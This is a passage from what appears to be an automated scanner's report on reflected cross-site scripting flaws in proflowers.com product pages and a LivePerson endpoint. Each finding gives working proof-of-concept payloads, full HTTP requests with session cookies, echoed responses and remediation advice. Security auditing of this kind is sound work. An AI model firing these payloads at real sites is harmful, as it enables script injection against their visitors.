Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:31:55 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:31:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:31:56 GMT
Content-Length: 137304


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
arden");
           s.prop1 = cleanString("PFC:Product:30008396-DeluxeSucculentGarden");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "PBS38208\\";alert(1)//9789dc0b2fb" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30008396_");
           }
           else if ( "PBS38208\\";alert(1)//9789dc0b2fb" == "MerchCart" ) {
                s.eVar6=cleanString("_:30008396_");
           }
           
...[SNIP]...
4.187. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [viewpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42874\"%3balert(1)//eb3bd423121 was submitted in the viewpos parameter. This input was echoed as 42874\\";alert(1)//eb3bd423121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=142874\"%3balert(1)//eb3bd423121&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:29:45 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:45 GMT
Content-Length: 138703


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
3_";
           }
           s.eVar37=cleanString("PFC:Product:30008396_Deluxe Succulent Garden");
           s.eVar51="PBS";
           s.events = "prodView,event5,event22,event23";
           s.products=";30008396;;;event5=1|event22=142874\\";alert(1)//eb3bd423121|event23=0.00";
       }

   </script>
...[SNIP]...
4.188. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [Ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82dd\"%3balert(1)//0a10d56d3ce was submitted in the Ref parameter. This input was echoed as c82dd\\";alert(1)//0a10d56d3ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRefc82dd\"%3balert(1)//0a10d56d3ce HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:27:58 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:27:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:27:57 GMT
Content-Length: 146906


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30003767","30003767","30003767","168084","27","HomeNoRefc82dd\\";alert(1)//0a10d56d3ce","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...
4.189. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 221e8\"%3balert(1)//f195e3e5061 was submitted in the tile parameter. This input was echoed as 221e8\\";alert(1)//f195e3e5061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA221e8\"%3balert(1)//f195e3e5061&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:26:08 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:26:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:26:08 GMT
Content-Length: 146314


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
_leftpod" || "" == "hmpgB_leftpod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_podA221e8\\";alert(1)//f195e3e5061" != "")
           {
               s.eVar20="PFC_hmpg_podA221e8\\";alert(1)//f195e3e5061_";
           }
           s.eVar37=cleanString("PFC:Product:30003767_The Ultimate Office Plant");
           s.eVar51="PBS";
           s.events = "prodVi
...[SNIP]...
4.190. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83ea7\"%3balert(1)//17cc815a216 was submitted in the trackingpgroup parameter. This input was echoed as 83ea7\\";alert(1)//17cc815a216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS83ea7\"%3balert(1)//17cc815a216&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:23:30 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:23:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:29 GMT
Content-Length: 141553


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
lant");
           s.prop1 = cleanString("PFC:Product:30003767-TheUltimateOfficePlant");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "PBS83ea7\\";alert(1)//17cc815a216" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30003767_");
           }
           else if ( "PBS83ea7\\";alert(1)//17cc815a216" == "MerchCart" ) {
                s.eVar6=cleanString("_:30003767_");
           }
           
...[SNIP]...
4.191. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [viewpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff98b\"%3balert(1)//1f7c8e9547f was submitted in the viewpos parameter. This input was echoed as ff98b\\";alert(1)//1f7c8e9547f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6ff98b\"%3balert(1)//1f7c8e9547f&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:20:39 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:20:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:20:39 GMT
Content-Length: 141634


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
";
           }
           s.eVar37=cleanString("PFC:Product:30003767_The Ultimate Office Plant");
           s.eVar51="PBS";
           s.events = "prodView,event5,event22,event23";
           s.products=";30003767;;;event5=1|event22=6ff98b\\";alert(1)//1f7c8e9547f|event23=0.00";
       }

   </script>
...[SNIP]...
4.192. http://sales.liveperson.net/hc/87011923/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/87011923/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 6c30f<img%20src%3da%20onerror%3dalert(1)>94c74c754a7 was submitted in the msessionkey parameter. This input was echoed as 6c30f<img src=a onerror=alert(1)>94c74c754a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/87011923/?&visitor=16601209214853&msessionkey=25522835487083372716c30f<img%20src%3da%20onerror%3dalert(1)>94c74c754a7&siteContainer=STANDALONE&site=87011923&cmd=mTagKnockPage&lpCallId=264594832202-36202526651&protV=20&lpjson=1&id=384168620&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 09 May 2011 01:11:51 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 2960

lpConnLib.Process({"ResultSet": {"lpCallId":"264594832202-36202526651","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='87011923-VID'; lpMTagConfig.FPC_VID='16601209214853'; lpMTagConfig.FPC_SKEY_NAME='87011923-SKEY'; lpMTagConfig.FPC_SKEY='25522835487083372716c30f<img src=a onerror=alert(1)>94c74c754a7';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_87011923'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...
4.193. http://www.proflowers.com/house-plants-PBS [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

